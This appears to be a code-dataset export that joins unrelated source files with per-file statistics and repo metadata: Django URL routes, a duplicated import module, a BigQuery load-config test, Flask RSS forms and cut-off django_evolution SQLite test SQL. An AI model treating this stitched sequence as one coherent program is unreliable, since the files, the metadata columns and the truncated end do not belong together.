re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getMinMaxVal/(?P<data>.*)$', token_required(productsapi.getMinMaxVal), name=u"get_tMin_Max_Val"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getsuggestedRange/(?P<data>.*)$', token_required(productsapi.getSuggestedRange), name=u"get_suggested_range"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductInsights$', token_required(productsapi.getProductInsights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductInsights/(?P<params>.*)$', token_required(productsapi.getProductInsights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_product_insights$', token_required(productsapi.get_product_insights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_product_insights/(?P<params>.*)$', token_required(productsapi.get_product_insights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductTypeInsights$', token_required(productsapi.getProductTypeInsights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/getProductTypeInsights/(?P<params>.*)$', token_required(productsapi.getProductTypeInsights), name=u"saveCustData"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/topproducts$', token_required(productsapi.topProducts), name=u"setconfiginfo"),
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/topproducts/(?P<params>.*)$', token_required(productsapi.topProducts), name=u"setconfiginfo"),
# industry
re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(?P<workspace>\d+)/get_industries$', token_required(industryapi.get_industry), name=u"getIndustry"),
# Pricing
# re_path(r'^(?P<user>\d+):(?P<token>[-\w\d-]+)/(\d+)/product-price-suggestion$', token_required(product_price_suggestion.suggest_price_for_product), name=u"suggest_price"),
]
| 107.992443
| 205
| 0.683437
| 5,734
| 42,873
| 4.982211
| 0.043076
| 0.020302
| 0.067383
| 0.073929
| 0.895302
| 0.862504
| 0.771143
| 0.721577
| 0.707645
| 0.690458
| 0
| 0.001483
| 0.056329
| 42,873
| 397
| 206
| 107.992443
| 0.704632
| 0.049752
| 0
| 0.007117
| 0
| 0.498221
| 0.50161
| 0.401559
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.003559
| 0.053381
| 0
| 0.053381
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
ae98d38374dc22d10e05086e15b3487b5807bbe3
| 299
|
py
|
Python
|
models/rec/__init__.py
|
BruceHan98/OCHTPS
|
5bee02bcbff36029cd47b4802178216f980a4298
|
[
"MIT"
] | null | null | null |
models/rec/__init__.py
|
BruceHan98/OCHTPS
|
5bee02bcbff36029cd47b4802178216f980a4298
|
[
"MIT"
] | null | null | null |
models/rec/__init__.py
|
BruceHan98/OCHTPS
|
5bee02bcbff36029cd47b4802178216f980a4298
|
[
"MIT"
] | null | null | null |
from .rec_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .rec_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .rec_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
from .rec_layer_new_with_tcn_big import DenseNet as DenseNet_with_TCN_big
| 37.375
| 73
| 0.896321
| 56
| 299
| 4.214286
| 0.178571
| 0.237288
| 0.338983
| 0.254237
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0.090301
| 299
| 7
| 74
| 42.714286
| 0.867647
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 14
|
ae9c5f841f49b16d3a7a89761212264bf529f80c
| 5,839
|
py
|
Python
|
tests/component/db/bigquery/test_load_config_options_variants.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 36
|
2020-03-17T11:56:51.000Z
|
2022-01-19T16:03:32.000Z
|
tests/component/db/bigquery/test_load_config_options_variants.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 60
|
2020-03-02T23:13:29.000Z
|
2021-05-19T15:05:42.000Z
|
tests/component/db/bigquery/test_load_config_options_variants.py
|
cwegrzyn/records-mover
|
e3b71d6c09d99d0bcd6a956b9d09d20f8abe98d2
|
[
"Apache-2.0"
] | 4
|
2020-08-11T13:17:37.000Z
|
2021-11-05T21:11:52.000Z
|
import unittest
from records_mover.records.delimited import complain_on_unhandled_hints
from records_mover.db.bigquery.load_job_config_options import load_job_config
from records_mover.records.load_plan import RecordsLoadPlan
from records_mover.records.processing_instructions import ProcessingInstructions
from records_mover.records.records_format import DelimitedRecordsFormat
class TestLoadJobConfigVariants(unittest.TestCase):
    """Component tests for load_job_config() across delimited records
    format variants.

    Each test builds a strict (fail-fast) load plan for one variant and
    checks either the produced BigQuery load configuration or the
    NotImplementedError raised for an unsupported hint.  The original
    five tests duplicated the plan-building boilerplate; it now lives in
    private helpers.
    """

    def _build_strict_plan(self, variant):
        """Build a fail-fast load plan for *variant*.

        Returns:
            tuple:
            (records_format, processing_instructions, load_plan,
            unhandled_hints)
        """
        records_format = DelimitedRecordsFormat(variant=variant)
        processing_instructions = ProcessingInstructions(
            fail_if_dont_understand=True,
            fail_if_cant_handle_hint=True,
            fail_if_row_invalid=True)
        load_plan = RecordsLoadPlan(
            processing_instructions=processing_instructions,
            records_format=records_format)
        unhandled_hints = set(records_format.hints.keys())
        return (records_format, processing_instructions, load_plan,
                unhandled_hints)

    def _assert_load_config(self, variant, expectations):
        """Assert that *variant* yields exactly *expectations* in the
        job config's 'load' section and leaves no hints unhandled."""
        (records_format, processing_instructions, load_plan,
         unhandled_hints) = self._build_strict_plan(variant)
        out = load_job_config(unhandled_hints, load_plan)
        complain_on_unhandled_hints(
            processing_instructions.fail_if_dont_understand,
            unhandled_hints, records_format.hints)
        self.assertEqual(out.to_api_repr()['load'], expectations)

    def _assert_unsupported_hint(self, variant, message_regex):
        """Assert that *variant* fails with a NotImplementedError whose
        message matches *message_regex*."""
        (_records_format, _processing_instructions, load_plan,
         unhandled_hints) = self._build_strict_plan(variant)
        with self.assertRaisesRegex(NotImplementedError, message_regex):
            load_job_config(unhandled_hints, load_plan)

    def test_load_job_config_bigquery_variant(self):
        self._assert_load_config('bigquery', {
            'allowJaggedRows': False,
            'allowQuotedNewlines': True,
            'autodetect': False,
            'createDisposition': 'CREATE_NEVER',
            'destinationTableProperties': {},
            'encoding': 'UTF-8',
            'fieldDelimiter': ',',
            'ignoreUnknownValues': True,
            'maxBadRecords': 0,
            'quote': '"',
            'schemaUpdateOptions': None,
            'skipLeadingRows': '1',
            'sourceFormat': 'CSV',
            'writeDisposition': 'WRITE_APPEND'
        })

    def test_load_job_config_dumb_variant(self):
        self._assert_load_config('dumb', {
            'allowJaggedRows': False,
            'autodetect': False,
            'createDisposition': 'CREATE_NEVER',
            'destinationTableProperties': {},
            'encoding': 'UTF-8',
            'fieldDelimiter': ',',
            'ignoreUnknownValues': True,
            'maxBadRecords': 0,
            'quote': '',
            'schemaUpdateOptions': None,
            'skipLeadingRows': '0',
            'sourceFormat': 'CSV',
            'writeDisposition': 'WRITE_APPEND'
        })

    def test_load_job_config_bluelabs(self):
        self._assert_unsupported_hint(
            'bluelabs',
            r"Implement hint escape='\\\\' or try again "
            "with fail_if_cant_handle_hint=False")

    def test_load_job_config_csv(self):
        self._assert_unsupported_hint(
            'csv',
            r"Implement hint dateformat='MM/DD/YY' or try again "
            "with fail_if_cant_handle_hint=False")

    def test_load_job_config_vertica(self):
        self._assert_unsupported_hint(
            'vertica',
            r"Implement hint record-terminator='\\x02' "
            "or try again with fail_if_cant_handle_hint=False")
| 55.084906
| 89
| 0.600959
| 498
| 5,839
| 6.662651
| 0.184739
| 0.090115
| 0.047016
| 0.038577
| 0.848704
| 0.801085
| 0.769138
| 0.769138
| 0.769138
| 0.769138
| 0
| 0.00204
| 0.32831
| 5,839
| 105
| 90
| 55.609524
| 0.843957
| 0
| 0
| 0.714286
| 0
| 0
| 0.129303
| 0.032197
| 0
| 0
| 0
| 0
| 0.05102
| 1
| 0.05102
| false
| 0
| 0.061224
| 0
| 0.122449
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
885939170e64c118508ceff8484f82d22800fb16
| 147
|
py
|
Python
|
Curso_Python.py/prueba15.py
|
elviscruz45/Python_avanzado
|
259c5f4dcccfe71fefcff86484f36672a22caefb
|
[
"MIT"
] | null | null | null |
Curso_Python.py/prueba15.py
|
elviscruz45/Python_avanzado
|
259c5f4dcccfe71fefcff86484f36672a22caefb
|
[
"MIT"
] | null | null | null |
Curso_Python.py/prueba15.py
|
elviscruz45/Python_avanzado
|
259c5f4dcccfe71fefcff86484f36672a22caefb
|
[
"MIT"
] | null | null | null |
def funcion():
    """Return the constant value 5."""
    resultado = 5
    return resultado
def generador():
    """Generator yielding a single value: the tuple (1, ..., 9).

    NOTE(review): `yield 1,2,...,9` yields ONE tuple, not nine separate
    values — the parentheses below make that explicit.
    """
    yield (1, 2, 3, 4, 5, 6, 7, 8, 9)
# Print a fresh generator object (its repr, not its values) three times.
for _ in range(3):
    print(generador())
| 11.307692
| 27
| 0.578231
| 22
| 147
| 3.863636
| 0.681818
| 0.494118
| 0.447059
| 0.658824
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.09009
| 0.244898
| 147
| 12
| 28
| 12.25
| 0.675676
| 0
| 0
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| true
| 0
| 0
| 0.142857
| 0.428571
| 0.428571
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
|
0
| 8
|
ee634f42e477062cb6c8e19f0b9c2f60630103fc
| 777
|
py
|
Python
|
rss_skill/forms.py
|
frybin/Alexa-Python-Skill
|
b729d303524a7e7b72c9becb7b7044afea6597fc
|
[
"MIT"
] | null | null | null |
rss_skill/forms.py
|
frybin/Alexa-Python-Skill
|
b729d303524a7e7b72c9becb7b7044afea6597fc
|
[
"MIT"
] | null | null | null |
rss_skill/forms.py
|
frybin/Alexa-Python-Skill
|
b729d303524a7e7b72c9becb7b7044afea6597fc
|
[
"MIT"
] | null | null | null |
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import DataRequired
class AddFeedForm(FlaskForm):
    """Form for adding a new RSS feed."""

    # Display name of the feed (required).
    name = StringField('RSS Feed Name', validators=[DataRequired()])
    # URL of the feed (required).
    link = StringField('RSS Feed Link', validators=[DataRequired()])
    # First article tag (required).
    article_1 = StringField('RSS Feed Tag 1', validators=[DataRequired()])
    # Second article tag (optional — no validators).
    article_2 = StringField('RSS Feed Tag 2')
    submit = SubmitField('Add Feed')
class EditFeedForm(FlaskForm):
    """Form for editing an existing RSS feed.

    NOTE(review): fields are identical to AddFeedForm except for the
    submit button label.
    """

    # Display name of the feed (required).
    name = StringField('RSS Feed Name', validators=[DataRequired()])
    # URL of the feed (required).
    link = StringField('RSS Feed Link', validators=[DataRequired()])
    # First article tag (required).
    article_1 = StringField('RSS Feed Tag 1', validators=[DataRequired()])
    # Second article tag (optional — no validators).
    article_2 = StringField('RSS Feed Tag 2')
    submit = SubmitField('Edit Feed')
| 43.166667
| 74
| 0.728443
| 89
| 777
| 6.303371
| 0.269663
| 0.199643
| 0.256684
| 0.149733
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0.727273
| 0
| 0.012121
| 0.150579
| 777
| 17
| 75
| 45.705882
| 0.837879
| 0
| 0
| 0.533333
| 0
| 0
| 0.160875
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
ee7a9c0aedbf40eb5aba9956a8c82f50fb6eca73
| 116,189
|
py
|
Python
|
django_evolution/tests/db/sqlite3.py
|
beanbaginc/django-evolution
|
fb76e44a2361a69a440dca086c0cc67ac6a4300d
|
[
"BSD-3-Clause"
] | 18
|
2015-02-08T14:48:02.000Z
|
2021-08-03T21:07:37.000Z
|
django_evolution/tests/db/sqlite3.py
|
beanbaginc/django-evolution
|
fb76e44a2361a69a440dca086c0cc67ac6a4300d
|
[
"BSD-3-Clause"
] | 4
|
2015-01-07T01:15:08.000Z
|
2020-08-06T06:52:13.000Z
|
django_evolution/tests/db/sqlite3.py
|
beanbaginc/django-evolution
|
fb76e44a2361a69a440dca086c0cc67ac6a4300d
|
[
"BSD-3-Clause"
] | 13
|
2015-01-07T01:06:21.000Z
|
2022-02-20T16:27:41.000Z
|
from __future__ import unicode_literals
import re
import django
from django.db.backends.sqlite3.base import Database
from django_evolution.tests.utils import (make_generate_index_name,
make_generate_unique_constraint_name)
# (major, minor) version tuples used for version-dependent SQL below.
django_version = django.VERSION[:2]
# NOTE(review): sqlite_version is not referenced in this chunk —
# presumably used by version-dependent SQL elsewhere in the module.
sqlite_version = Database.sqlite_version_info[:2]

# Django 2.0 through 3.0 emit 'DESC' with no leading space; earlier and
# later versions include the leading space.
if django_version < (2, 0) or django_version >= (3, 1):
    DESC = ' DESC'
else:
    DESC = 'DESC'
def add_field(connection):
    """SQL test statements for the AddFieldTests suite.

    Args:
        connection (django.db.backends.base.BaseDatabaseWrapper):
            The connection being tested.

    Returns:
        dict:
        The dictionary of SQL mappings.
    """
    try:
        # Django >= 1.8
        data_types_suffix = connection.data_types_suffix
    except AttributeError:
        try:
            # Django == 1.7
            data_types_suffix = connection.creation.data_types_suffix
        except AttributeError:
            # Django < 1.7
            data_types_suffix = {}

    def get_field_suffix(field_type):
        # Return the backend's column-type suffix for field_type,
        # prefixed with a space, or '' when none is defined.
        try:
            return ' %s' % data_types_suffix[field_type]
        except KeyError:
            return ''

    generate_index_name = make_generate_index_name(connection)
    generate_unique_constraint_name = \
        make_generate_unique_constraint_name(connection)

    # SQLite can't add constrained columns in place, so each entry
    # rebuilds the table: CREATE "TEMP_TABLE", INSERT ... SELECT,
    # DROP the old table, then RENAME (plus CREATE INDEX when needed).
    mappings = {
        'AddNonNullNonCallableColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" integer NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
            ' "added_field")'
            ' SELECT "id", "char_field", "int_field", 1'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddNonNullCallableColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" integer NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
            ' "added_field")'
            ' SELECT "id", "char_field", "int_field", "int_field"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddNullColumnWithInitialColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" integer NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
            ' "added_field")'
            ' SELECT "id", "char_field", "int_field", 1'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddStringColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" varchar(10) NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
            ' "added_field")'
            ' SELECT "id", "char_field", "int_field", \'abc\\\'s xyz\''
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddBlankStringColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" varchar(10) NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
            ' "added_field")'
            ' SELECT "id", "char_field", "int_field", \'\''
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddDateColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" datetime NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
            ' "added_field")'
            ' SELECT "id", "char_field", "int_field", 2007-12-13 16:42:00'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddDefaultColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" integer NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
            ' "added_field")'
            ' SELECT "id", "char_field", "int_field", 42'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddMismatchInitialBoolColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" bool NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
            ' "added_field")'
            ' SELECT "id", "char_field", "int_field", 0'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddEmptyStringDefaultColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" varchar(20) NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field",'
            ' "added_field")'
            ' SELECT "id", "char_field", "int_field", \'\''
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddNullColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("int_field" integer NOT NULL,'
            ' "id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "added_field" integer NOT NULL);',
            'INSERT INTO "TEMP_TABLE" ("int_field", "id", "char_field")'
            ' SELECT "int_field", "id", "char_field"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'NonDefaultColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "non-default_column" integer NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field")'
            ' SELECT "id", "char_field", "int_field"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddColumnCustomTableModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "value" integer NOT NULL,'
            ' "alt_value" varchar(20) NOT NULL,'
            ' "added_field" integer NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "value", "alt_value")'
            ' SELECT "id", "value", "alt_value"'
            ' FROM "custom_table_name";',
            'DROP TABLE "custom_table_name";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "custom_table_name";',
        ],
        'AddIndexedColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "add_field" integer NULL);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field")'
            ' SELECT "id", "char_field", "int_field"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("add_field");'
            % generate_index_name('tests_testmodel', 'add_field',
                                  'add_field'),
        ],
        'AddUniqueColumnModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" integer NULL UNIQUE);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field")'
            ' SELECT "id", "char_field", "int_field"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddUniqueIndexedModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field" integer NULL UNIQUE);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field")'
            ' SELECT "id", "char_field", "int_field"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
        ],
        'AddForeignKeyModel': [
            'CREATE TABLE "TEMP_TABLE" '
            '("id" integer NOT NULL UNIQUE PRIMARY KEY,'
            ' "char_field" varchar(20) NOT NULL,'
            ' "int_field" integer NOT NULL,'
            ' "added_field_id" integer NULL'
            ' REFERENCES "tests_addanchor1" ("id")'
            ' DEFERRABLE INITIALLY DEFERRED);',
            'INSERT INTO "TEMP_TABLE" ("id", "char_field", "int_field")'
            ' SELECT "id", "char_field", "int_field"'
            ' FROM "tests_testmodel";',
            'DROP TABLE "tests_testmodel";',
            'ALTER TABLE "TEMP_TABLE" RENAME TO "tests_testmodel";',
            'CREATE INDEX "%s" ON "tests_testmodel" ("added_field_id");'
            % generate_index_name('tests_testmodel', 'added_field_id',
                                  'added_field'),
        ],
    }

    # Many-to-many join-table SQL differs by Django version:
    if django_version >= (2, 0):
        # Django >= 2.0: FK references are DEFERRABLE, and the unique
        # constraint becomes a separately-created UNIQUE INDEX.
        mappings.update({
            'AddManyToManyDatabaseTableModel': [
                'CREATE TABLE "tests_testmodel_added_field" '
                '("id" integer NOT NULL PRIMARY KEY%s,'
                ' "testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED,'
                ' "addanchor1_id" integer NOT NULL'
                ' REFERENCES "tests_addanchor1" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED'
                ');'
                % get_field_suffix('AutoField'),
                'CREATE UNIQUE INDEX "%s" ON'
                ' "tests_testmodel_added_field"'
                ' ("testmodel_id", "addanchor1_id");'
                % generate_unique_constraint_name(
                    'tests_testmodel_added_field',
                    ['testmodel_id', 'addanchor1_id']),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'testmodel_id'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("addanchor1_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'addanchor1_id'),
            ],
            'AddManyToManyNonDefaultDatabaseTableModel': [
                'CREATE TABLE "tests_testmodel_added_field" '
                '("id" integer NOT NULL PRIMARY KEY%s,'
                ' "testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED,'
                ' "addanchor2_id" integer NOT NULL'
                ' REFERENCES "custom_add_anchor_table" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED'
                ');'
                % get_field_suffix('AutoField'),
                'CREATE UNIQUE INDEX "%s" ON'
                ' "tests_testmodel_added_field"'
                ' ("testmodel_id", "addanchor2_id");'
                % generate_unique_constraint_name(
                    'tests_testmodel_added_field',
                    ['testmodel_id', 'addanchor2_id']),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'testmodel_id'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("addanchor2_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'addanchor2_id'),
            ],
            'AddManyToManySelf': [
                'CREATE TABLE "tests_testmodel_added_field" '
                '("id" integer NOT NULL PRIMARY KEY%s,'
                ' "from_testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED,'
                ' "to_testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id")'
                ' DEFERRABLE INITIALLY DEFERRED'
                ');'
                % get_field_suffix('AutoField'),
                'CREATE UNIQUE INDEX "%s" ON "tests_testmodel_added_field"'
                ' ("from_testmodel_id", "to_testmodel_id");'
                % generate_unique_constraint_name(
                    'tests_testmodel_added_field',
                    ['from_testmodel_id', 'to_testmodel_id']),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("from_testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'from_testmodel_id'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("to_testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'to_testmodel_id'),
            ],
        })
    elif django_version >= (1, 9):
        # Django 1.9–1.11: same shape but FK references are not
        # DEFERRABLE.
        mappings.update({
            'AddManyToManyDatabaseTableModel': [
                'CREATE TABLE "tests_testmodel_added_field" '
                '("id" integer NOT NULL PRIMARY KEY%s,'
                ' "testmodel_id" integer NOT NULL'
                ' REFERENCES "tests_testmodel" ("id"),'
                ' "addanchor1_id" integer NOT NULL'
                ' REFERENCES "tests_addanchor1" ("id")'
                ');'
                % get_field_suffix('AutoField'),
                'CREATE UNIQUE INDEX "%s" ON'
                ' "tests_testmodel_added_field"'
                ' ("testmodel_id", "addanchor1_id");'
                % generate_unique_constraint_name(
                    'tests_testmodel_added_field',
                    ['testmodel_id', 'addanchor1_id']),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("testmodel_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'testmodel_id'),
                'CREATE INDEX "%s" ON'
                ' "tests_testmodel_added_field" ("addanchor1_id");'
                % generate_index_name('tests_testmodel_added_field',
                                      'addanchor1_id'),
            ],
            'AddManyToManyNonDefaultDatabaseTableModel': [
                'CREATE TABLE "tests_testmodel_added_field" '
                '("id" integer NOT NULL PRIMARY KEY%s,'
                ' "testmodel_id" integer NOT NULL'
